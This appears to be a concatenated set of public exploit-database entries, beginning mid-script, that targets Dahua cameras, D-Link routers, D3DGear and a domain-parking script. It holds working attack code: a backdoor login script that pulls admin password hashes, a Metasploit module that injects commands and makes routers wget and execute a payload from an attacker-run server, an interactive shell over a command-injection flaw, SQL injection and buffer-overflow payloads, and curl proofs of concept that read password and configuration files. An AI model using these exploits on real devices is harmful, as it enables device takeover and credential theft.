# { "error" : { "code" : 268632070, "message" : "Component error: user's name not valid!" }, "id" : 10000, "result" : false, "session" : 1997734656 }
#
# Successfull login
# { "id" : 10000, "params" : null, "result" : true, "session" : 1626533888 }
#
#
# Logout
#
print "[>] Logging out"
query_args = {"method":"global.logout",
"params":"null",
"session":json_obj['session'],
"id":10001}
URI = '/RPC2'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,None)
return response
#
# Generation 3
#
def Gen3(self,response,headers):
self.response = response
self.headers = headers
json_obj = commentjson.load(self.response)
if self.verbose:
print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': '))
#
# Check for first availible admin user
#
for who in json_obj[json_obj.keys()[0]]:
if who['Group'] == 'admin': # Check if user is in admin group
USER_NAME = who['Name'] # Save login name
PWDDB_HASH = who['Password'] # Save hash
print "[i] Choosing Admin Login: {}".format(who['Name'])
break
#
# Request login
#
print "[>] Requesting our session ID"
query_args = {"method":"global.login",
"params":{
"userName":USER_NAME,
"password":"",
"clientType":"Web3.0"},
"id":10000}
URI = '/RPC2_Login'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,None)
json_obj = json.load(response)
if self.verbose:
print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': '))
#
# Generate login MD5 hash with all required info we have downloaded
#
RANDOM = json_obj['params']['random']
PASS = ''+ USER_NAME +':' + RANDOM + ':' + PWDDB_HASH + ''
RANDOM_HASH = hashlib.md5(PASS).hexdigest().upper()
print "[i] Downloaded MD5 hash:",PWDDB_HASH
print "[i] Random value to encrypt with:",RANDOM
print "[i] Built password:",PASS
print "[i] MD5 generated password:",RANDOM_HASH
#
# Login
#
print "[>] Logging in"
query_args = {"method":"global.login",
"session":json_obj['session'],
"params":{
"userName":USER_NAME,
"password":RANDOM_HASH,
"clientType":"Web3.0",
"authorityType":"Default"},
"id":10000}
URI = '/RPC2_Login'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,json_obj['session'])
print response.read()
# Wrong username/password
# { "error" : { "code" : 268632071, "message" : "Component error: password not valid!" }, "id" : 10000, "result" : false, "session" : 1156538295 }
# { "error" : { "code" : 268632070, "message" : "Component error: user's name not valid!" }, "id" : 10000, "result" : false, "session" : 1175812023 }
#
# Successfull login
# { "id" : 10000, "params" : null, "result" : true, "session" : 1175746743 }
#
#
# Logout
#
print "[>] Logging out"
query_args = {"method":"global.logout",
"params":"null",
"session":json_obj['session'],
"id":10001}
URI = '/RPC2'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,None)
return response
#
# Validate correctness of HOST, IP and PORT
#
class Validate:
def __init__(self,verbose):
self.verbose = verbose
# Check if IP is valid
def CheckIP(self,IP):
self.IP = IP
ip = self.IP.split('.')
if len(ip) != 4:
return False
for tmp in ip:
if not tmp.isdigit():
return False
i = int(tmp)
if i < 0 or i > 255:
return False
return True
# Check if PORT is valid
def Port(self,PORT):
self.PORT = PORT
if int(self.PORT) < 1 or int(self.PORT) > 65535:
return False
else:
return True
# Check if HOST is valid
def Host(self,HOST):
self.HOST = HOST
try:
# Check valid IP
socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP
# Now we check if it is correct typed IP
if self.CheckIP(self.HOST):
return self.HOST
else:
return False
except socket.error as e:
# Else check valid DNS name, and use the IP address
try:
self.HOST = socket.gethostbyname(self.HOST)
return self.HOST
except socket.error as e:
return False
if __name__ == '__main__':
#
# Help, info and pre-defined values
#
INFO = '[Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]\n'
HTTP = "http"
HTTPS = "https"
proto = HTTP
verbose = False
raw_request = True
rhost = '192.168.5.2' # Default Remote HOST
rport = '80' # Default Remote PORT
creds = False # creds = 'user:pass'
#
# Try to parse all arguments
#
try:
arg_parser = argparse.ArgumentParser(
prog=sys.argv[0],
description=('[*] '+ INFO +' [*]'))
arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
if creds:
arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')
arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')
args = arg_parser.parse_args()
except Exception as e:
print INFO,"\nError: %s\n" % str(e)
sys.exit(1)
# We want at least one argument, so print out help
if len(sys.argv) == 1:
arg_parser.parse_args(['-h'])
print "\n[*]",INFO
if args.verbose:
verbose = args.verbose
#
# Check validity, update if needed, of provided options
#
if args.https:
proto = HTTPS
if not args.rport:
rport = '443'
if creds and args.auth:
creds = args.auth
if args.rport:
rport = args.rport
if args.rhost:
rhost = args.rhost
# Check if RPORT is valid
if not Validate(verbose).Port(rport):
print "[!] Invalid RPORT - Choose between 1 and 65535"
sys.exit(1)
# Check if RHOST is valid IP or FQDN, get IP back
rhost = Validate(verbose).Host(rhost)
if not rhost:
print "[!] Invalid RHOST"
sys.exit(1)
#
# Validation done, start print out stuff to the user
#
if args.https:
print "[i] HTTPS / SSL Mode Selected"
print "[i] Remote target IP:",rhost
print "[i] Remote target PORT:",rport
rhost = rhost + ':' + rport
headers = {
'X-Requested-With' : 'XMLHttpRequest',
'X-Request' : 'JSON',
'User-Agent':'Dahua/2.0; Dahua/3.0'
}
#
# Try to find /current_config/passwd user database (Generation 2)
#
try:
print "[>] Checking for backdoor version"
URI = "/current_config/passwd"
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None)
print "[!] Generation 2 found"
reponse = Dahua_Backdoor(rhost,proto,verbose,creds,raw_request).Gen2(response,headers)
except urllib2.HTTPError as e:
#
# If not, try to find /current_config/Account1 user database (Generation 3)
#
if e.code == 404:
try:
URI = '/current_config/Account1'
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None)
print "[!] Generation 3 Found"
response = Dahua_Backdoor(rhost,proto,verbose,creds,raw_request).Gen3(response,headers)
except urllib2.HTTPError as e:
if e.code == 404:
print "[!] Patched or not Dahua device! ({})".format(e.code)
sys.exit(1)
else:
print "Error Code: {}".format(e.code)
except Exception as e:
print "[!] Detect of target failed ({})".format(e)
sys.exit(1)
print "\n[*] All done...\n"
sys.exit(0)
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: D3DGear 5.00 Build 2175 - Buffer Overflow
# Date: 07-11-2017
# Vulnerable Software: D3DGear 5.00 Build 2175
# Vendor Homepage: http://www.d3dgear.com/
# Version: 5.00 Build 2175
# Software Link: http://www.d3dgear.com/products.htm
# Tested On: Windows 7 x86
#
#
# PoC: generate crash.txt, open program, select broadcast, paste crash.txt contents in stream key
#
# app crashes; 00420042 Pointer to next SEH record; no eip overwrite; one unicode ppr pointer
#
file = "crash.txt"
buffer = "A"* 1284 + "B"*4
writeFile = open (file, "w")
writeFile.write( buffer )
writeFile.close()
<!--
# # # # #
# Exploit Title: D-Park Pro Domain Parking Script 1.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.domainzaar.com/
# Software Link: http://www.domainzaar.com/
# Demo: http://www.d-park-pro.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15958
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# # # # #
-->
<form id="loginform" action="http://localhost/[PATH]/admin/loginform.php" method="post">
<label for="form_username">Username:</label>
<input type="text" name="username" value="' UNION ALL SELECT 0x31,0x32,0x33,CONCAT(0x494853414e2053454e43414e)-- Ver Ayari" />
<label for="form_password">Password:</label>
<input type="password" name="password" id="form_password" />
<input name="login" value="Log In" type="submit">
</form>
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking # Only tested on Emulated environment
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link/TRENDnet NCC Service Command Injection',
'Description' => %q{
This module exploits a remote command injection vulnerability on several routers. The
vulnerability exists in the ncc service, while handling ping commands. This module has
been tested on a DIR-626L emulated environment. Several D-Link and TRENDnet devices
are reported as affected, including: D-Link DIR-626L (Rev A) v1.04b04, D-Link DIR-636L
(Rev A) v1.04, D-Link DIR-808L (Rev A) v1.03b05, D-Link DIR-810L (Rev A) v1.01b04, D-Link
DIR-810L (Rev B) v2.02b01, D-Link DIR-820L (Rev A) v1.02B10, D-Link DIR-820L (Rev A)
v1.05B03, D-Link DIR-820L (Rev B) v2.01b02, D-Link DIR-826L (Rev A) v1.00b23, D-Link
DIR-830L (Rev A) v1.00b07, D-Link DIR-836L (Rev A) v1.01b03 and TRENDnet TEW-731BR (Rev 2)
v2.01b01
},
'Author' =>
[
'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery and initial PoC
'Tiago Caetano Henriques', # Vulnerability discovery and initial PoC
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-1187'],
['BID', '72816'],
['URL', 'https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2'],
['URL', 'http://seclists.org/fulldisclosure/2015/Mar/15'],
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10052']
],
'Targets' =>
# Only tested on D-Link DIR-626L where wget is available
[
[ 'Linux mipsel Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
],
[ 'Linux mipsbe Payload',
{
'Arch' => ARCH_MIPSBE,
'Platform' => 'linux'
}
],
],
'DisclosureDate' => 'Feb 26 2015',
'DefaultTarget' => 0))
register_options(
[
OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]),
OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]),
OptString.new('TARGETURI', [true, 'The base path to the vulnerable application area', '/ping.ccp']),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 10])
], self.class)
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
# unknown if other devices also using mini_httpd
if res && [500].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exec_command(cmd, timeout = 20)
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'encode_params' => false,
'vars_post' => {
'ccp_act' => 'ping_v6',
'ping_addr' => '$(' + cmd + ')'
}
}, timeout)
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def primer
@payload_url = get_uri
wget_payload
end
def exploit
print_status("Accessing the vulnerable URL...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL")
end
print_status("Exploiting...")
@pl = generate_payload_exe
@payload_url = ''
@dropped_elf = rand_text_alpha(rand(5) + 3)
if datastore['EXTURL'].blank?
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
end
chmod_payload
exec_payload
else
@payload_url = datastore['EXTURL']
wget_payload
chmod_payload
exec_payload
end
end
def wget_payload
upload_path = File.join(datastore['WRITABLEDIR'], @dropped_elf)
cmd = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{upload_path}"
print_status("Downloading the payload to the target machine...")
res = exec_command(cmd)
if res && [200].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/
register_files_for_cleanup(upload_path)
else
fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")
end
end
def chmod_payload
cmd = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"
print_status("chmod the payload...")
res = exec_command(cmd, 1)
unless res
fail_with(Failure::Unknown, "#{peer} - Unable to chmod payload")
end
Rex.sleep(1)
end
def exec_payload
cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf)
print_status("Executing the payload...")
res = exec_command(cmd, 1)
unless res
fail_with(Failure::Unknown, "#{peer} - Unable to exec payload")
end
Rex.sleep(1)
end
# Handle incoming requests to the HTTP server
def on_request_uri(cli, request)
print_status("Request: #{request.uri}")
if request.uri =~ /#{Regexp.escape(get_resource)}/
print_status('Sending payload...')
send_response(cli, @pl)
end
end
end
source: https://www.securityfocus.com/bid/51918/info
D-Link ShareCenter products are prone to multiple remote code-execution vulnerabilities.
Successful exploits will result in the execution of arbitrary code in the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.
The following products are affected:
D-Link DNS-320 ShareCenter
D-Link DNS-325 ShareCenter
http://www.example.com/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=ls
http://www.example.com/cgi-bin/discovery.cgi
http://www.example.com/cgi-bin/system_mgr.cgi?cmd=get_firm_v_xml
#!/usr/bin/python
# Exploit Title: D-Link WAP 615/645/815 < 1.03 service.cgi RCE
# Exploit Author: Cr0n1c
# Vendor Homepage: us.dlink.com
# Software Link: https://github.com/Cr0n1c/dlink_shell_poc/blob/master/dlink_auth_rce
# Version: 1.03
# Tested on: D-Link 815 v1.03
import argparse
import httplib
import random
import re
import requests
import string
import urllib2
DLINK_REGEX = ['Product Page : <a href="http://support.dlink.com" target="_blank">(.*?)<',
'<div class="modelname">(.*?)</div>',
'<div class="pp">Product Page : (.*?)<a href="javascript:check_is_modified">'
]
def dlink_detection():
try:
r = requests.get(URL, timeout=10.00)
except requests.exceptions.ConnectionError:
print "Error: Failed to connect to " + URL
return False
if r.status_code != 200:
print "Error: " + URL + " returned status code " + str(r.status_code)
return False
for rex in DLINK_REGEX:
if re.search(rex, r.text):
res = re.findall(rex, r.text)[0]
return res
print "Warning: Unable to detect device for " + URL
return "Unknown Device"
def create_session():
post_content = {"REPORT_METHOD": "xml",
"ACTION": "login_plaintext",
"USER": "admin",
"PASSWD": PASSWORD,
"CAPTCHA": ""
}
try:
r = requests.post(URL + "/session.cgi", data=post_content, headers=HEADER)
except requests.exceptions.ConnectionError:
print "Error: Failed to access " + URL + "/session.cgi"
return False
if not (r.status_code == 200 and r.reason == "OK"):
print "Error: Did not recieve a HTTP 200"
return False
if not re.search("<RESULT>SUCCESS</RESULT>", r.text):
print "Error: Did not get a success code"
return False
return True
def parse_results(result):
print result[100:]
return result
def send_post(command, print_res=True):
post_content = "EVENT=CHECKFW%26" + command + "%26"
method = "POST"
if URL.lower().startswith("https"):
handler = urllib2.HTTPSHandler()
else:
handler = urllib2.HTTPHandler()
opener = urllib2.build_opener(handler)
request = urllib2.Request(URL + "/service.cgi", data=post_content, headers=HEADER)
request.get_method = lambda: method
try:
connection = opener.open(request)
except urllib2.HTTPError:
print "Error: failed to connect to " + URL + "/service.cgi"
return False
except urllib2.HTTPSError:
print "Error: failed to connect to " + URL + "/service.cgi"
return False
if not connection.code == 200:
print "Error: Recieved status code " + str(connection.code)
return False
attempts = 0
while attempts < 5:
try:
data = connection.read()
except httplib.IncompleteRead:
attempts += 1
else:
break
if attempts == 5:
print "Error: Chunking failed %d times, bailing." %attempts
return False
if print_res:
return parse_results(data)
else:
return data
def start_shell():
print "+" + "-" * 80 + "+"
print "| Welcome to D-Link Shell" + (" " * 56) + "|"
print "+" + "-" * 80 + "+"
print "| This is a limited shell that exploits piss poor programming. I created this |"
print "| to give you a comfort zone and to emulate a real shell environment. You will |"
print "| be limited to basic busybox commands. Good luck and happy hunting. |"
print "|" + (" " * 80) + "|"
print "| To quit type 'gtfo'" + (" " * 60) + "|"
print "+" + "-" * 80 + "+\n\n"
cmd = ""
while True:
cmd = raw_input(ROUTER_TYPE + "# ").strip()
if cmd.lower() == "gtfo":
break
send_post(cmd)
def query_getcfg(param):
post_data = {"SERVICES": param}
try:
r = requests.post(URL + "/getcfg.php", data=post_data, headers=HEADER)
except requests.exceptions.ConnectionError:
print "Error: Failed to access " + URL + "/getcfg.php"
return False
if not (r.status_code == 200 and r.reason == "OK"):
print "Error: Did not recieve a HTTP 200"
return False
if re.search("<message>Not authorized</message>", r.text):
print "Error: Not vulnerable"
return False
return r.text
def attempt_password_find():
# Going fishing in DEVICE.ACCOUNT looking for CWE-200 or no password
data = query_getcfg("DEVICE.ACCOUNT")
if not data:
return False
res = re.findall("<password>(.*?)</password>", data)
if len(res) > 0 and res != "=OoXxGgYy=":
return res[0]
# Did not find it in first attempt
data = query_getcfg("WIFI")
if not data:
return False
res = re.findall("<key>(.*?)</key>", data)
if len(res) > 0:
return res[0]
# All attempts failed, just going to return and wish best of luck!
return False
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="D-Link 615/815 Service.cgi RCE")
parser.add_argument("-p", "--password", dest="password", action="store", default=None,
help="Password for the router. If not supplied then will use blank password.")
parser.add_argument("-u", "--url", dest="url", action="store", required=True,
help="[Required] URL for router (i.e. http://10.1.1.1:8080)")
parser.add_argument("-x", "--attempt-exploit", dest="attempt_exploit", action="store_true", default=False,
help="If flag is set, will attempt CWE-200. If that fails, then will attempt to discover "
"wifi password and use it.")
args = parser.parse_args()
HEADER = {"Cookie": "uid=" + "".join(random.choice(string.letters) for _ in range(10)),
"Host": "localhost",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
}
URL = args.url.lower().strip()
if not URL.startswith("http"):
URL = "http://" + URL
ROUTER_TYPE = dlink_detection()
if not ROUTER_TYPE:
print "EXITING . . ."
exit()
if args.attempt_exploit and args.password is None:
res = attempt_password_find()
if res:
PASSWORD = res
else:
PASSWORD = ""
print "[+] Switching password to: " + PASSWORD
elif args.password:
PASSWORD = args.password
else:
PASSWORD = ""
if not create_session():
print "EXITING . . ."
exit()
if len(send_post("ls", False)) == 0:
print "Appears this device [%s] is not vulnerable. EXITING . . ." %ROUTER_TYPE
exit()
start_shell()
## Password stored in plaintext
CVE: CVE-2018-10824
Description:
An issue was discovered on D-Link routers:
DWR-116 through 1.06,
DIR-140L through 1.02,
DIR-640L through 1.02,
DWR-512 through 2.02,
DWR-712 through 2.02,
DWR-912 through 2.02,
DWR-921 through 2.02,
DWR-111 through 1.01,
and probably others with the same type of firmware.
NOTE: I have changed the filename in description to XXX because the vendor leaves some EOL routers unpatched and the attack is too simple
The administrative password is stored in plaintext in the /tmp/XXX/0 file. An attacker having a directory traversal (or LFI) can easily get full router access.
PoC using the directory traversal vulnerability disclosed above - CVE-2018-10822
`$ curl http://routerip/uir//tmp/XXX/0`
This command returns a binary config file which contains admin username and password as well as many other router configuration settings. By using the directory traversal vulnerability it is possible to read the file without authentication.
Directory Traversal
CVE: CVE-2018-10822
CVSS v3: 8.6
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Description: Directory traversal vulnerability in the web interface on D-Link routers:
DWR-116 through 1.06,
DIR-140L through 1.02,
DIR-640L through 1.02,
DWR-512 through 2.02,
DWR-712 through 2.02,
DWR-912 through 2.02,
DWR-921 through 2.02,
DWR-111 through 1.01,
and probably others with the same type of firmware
allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
NOTE: this vulnerability exists because of an incorrect fix for CVE-2017-6190.
PoC:
`$ curl http://routerip/uir//etc/passwd`
The vulnerability can be used retrieve administrative password using the other disclosed vulnerability - CVE-2018-10824.
This vulnerability was reported previously by Patryk Bogdan in CVE-2017-6190 but he reported it is fixed in certain release but unfortunately it is still present in even newer releases. The vulnerability is also present in other D-Link routers and can be exploited not only (as the original author stated) by double dot but also absolutely using double slash.
## Shell command injection
CVE: CVE-2018-10823
CVSS v3: 9.1
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Description: An issue was discovered on D-Link routers:
DWR-116 through 1.06,
DWR-512 through 2.02,
DWR-712 through 2.02,
DWR-912 through 2.02,
DWR-921 through 2.02,
DWR-111 through 1.01,
and probably others with the same type of firmware.
An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.
PoC:
Login to the router.
Request the following URL after login:
`$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd`
See the passwd file contents in the response.
D-Link DWR-932 Firmware <= V4.00 Authentication Bypass - Password Disclosure
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
Product: D-Link DWR-932
Tested Version: Firmware V4.00(EU)b03
Vendor: D-Link http://www.dlink.com/
Product URL: http://www.dlink.com/uk/en/home-solutions/work/personal-hotspots/dwr-932-4g-lte-mobile-wi-fi-hotspot-150-mbps
Date: 20 Mar 2016
About Product:
---------------
The DWR-932 4G LTE Mobile Wi-Fi Hotspot 150 Mbps is a 4G/LTE Cat4 high speed broadband Wi-Fi mobile hotspot. The DWR-932 uses a 4G Internet connection to give you a simple and fast Wi-Fi network anywhere you need.
Vulnerability Details:
----------------------
The Cgi Script "/cgi-bin/dget.cgi" handles most of user side and server side requests, but there is no observation on requests recieved from unauthorized users.
so the attacker will be able to view Adminitrative or Wifi Password in clear text by visiting below URLs.
View Admin Username and Password:
http://192.168.0.1/cgi-bin/dget.cgi?cmd=DEVICE_web_usrname,DEVICE_web_passwd,DEVICE_login_timeout&_=1458459188807
Output:
{ "DEVICE_web_usrname": "MyUsErNaMe", "DEVICE_web_passwd": "MyPaSsWoRd", "DEVICE_login_timeout": "600" }
View Wifi Password:
http://192.168.0.1/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703
Output:
{ "wifi_AP1_ssid": "dlink-DWR-932", "wifi_AP1_hidden": "0", "wifi_AP1_passphrase": "MyPaSsPhRaSe", "wifi_AP1_passphrase_wep": "", "wifi_AP1_security_mode": "3208,8", "wifi_AP1_enable": "1", "get_mac_filter_list": "", "get_mac_filter_switch": "0", "get_client_list": "9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0", "get_mac_address": "c4:00:f5:00:ec:40", "get_wps_dev_pin": "", "get_wps_mode": "0", "get_wps_enable": "0", "get_wps_current_time": "" }
Export All Configurations:
http://192.168.0.1/cgi-bin/export_cfg.cgi
#EOF
# Title: D-Link DWR-116 Arbitrary File Download
# Vendor: D-Link (www.dlink.com)
# Affected model(s): DWR-116 / DWR-116A1
# Tested on: V1.01(EU), V1.00(CP)b10, V1.05(AU)
# CVE: CVE-2017-6190
# Date: 04.07.2016
# Author: Patryk Bogdan (@patryk_bogdan)
Description:
D-Link DWR-116 with firmware before V1.05b09 suffers from vulnerability
which leads to unathorized file download from device filesystem.
PoC:
HTTP Request:
GET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.2.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
HTTP Response:
HTTP/1.0 200 OK
Content-Type: application/x-none
Cache-Control: max-age=60
Connection: close
root:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash
nobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin
ftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin
Fix:
Update device to the new firmware (V1.05b09)